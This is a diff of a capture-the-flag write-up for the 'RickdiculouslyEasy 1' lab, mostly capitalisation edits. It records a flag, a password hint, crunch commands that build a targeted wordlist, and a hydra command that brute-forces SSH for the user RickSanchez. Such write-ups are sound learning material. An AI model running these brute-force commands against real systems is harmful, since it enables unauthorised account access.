aswil192/writeups/RickdiculouslyEasy 1.md

 ```
 got the flag
 `FLAG{And Awwwaaaaayyyy we Go!} - 20 Points`=90/130
-also got the password hint
+Also got the password hint

-got his band name as:
+Got his band name as:
 `The Flesh Curtains` in the episode `Big Trouble in Little Sanchez`

-used `crunch` to make a custom wordlist
+Used `crunch` to make a custom wordlist
 ```
 crunch 5 5 -t ,%The > rick_wordlist.txt
 crunch 7 7 -t ,%Flesh >> rick_wordlist.txt
 crunch 10 10 -t ,%Curtains >> rick_wordlist.txt
 ```

-used hydra to brute-force the ssh of `RickSanchez`
+Used Hydra to brute-force the SSH of `RickSanchez`
 ```
 hydra -l RickSanchez -P rick_wordlist.txt $ip ssh -f -W 5 -t 64 -s 22222
 ```